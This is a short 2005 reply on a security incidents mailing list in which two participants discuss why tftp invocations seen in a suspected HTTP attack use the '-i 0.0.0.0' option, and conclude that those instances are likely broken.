Security Incidents mailing list archives

Re: New http attack?

From: Ron <iago () valhallalegends com>
Date: Fri, 10 Jun 2005 06:26:10 -0500

For listening connections, yes, 0.0.0.0 binds to all interfaces;
however, tftp isn't listening, it's making an outgoing connection.

I eventually found one that isn't 0.0.0.0, it's an actual ip, which
leads me to believe that the 0.0.0.0 ones are just broken.

Alex wrote:
Isn't "-i 0.0.0.0" telling tftp to what interface to bind?

0.0.0.0 is usually a generic address that means to bind to ALL
interfaces...  I suppose they are just being lazy -- they already know
the IP address of the server!

-Alex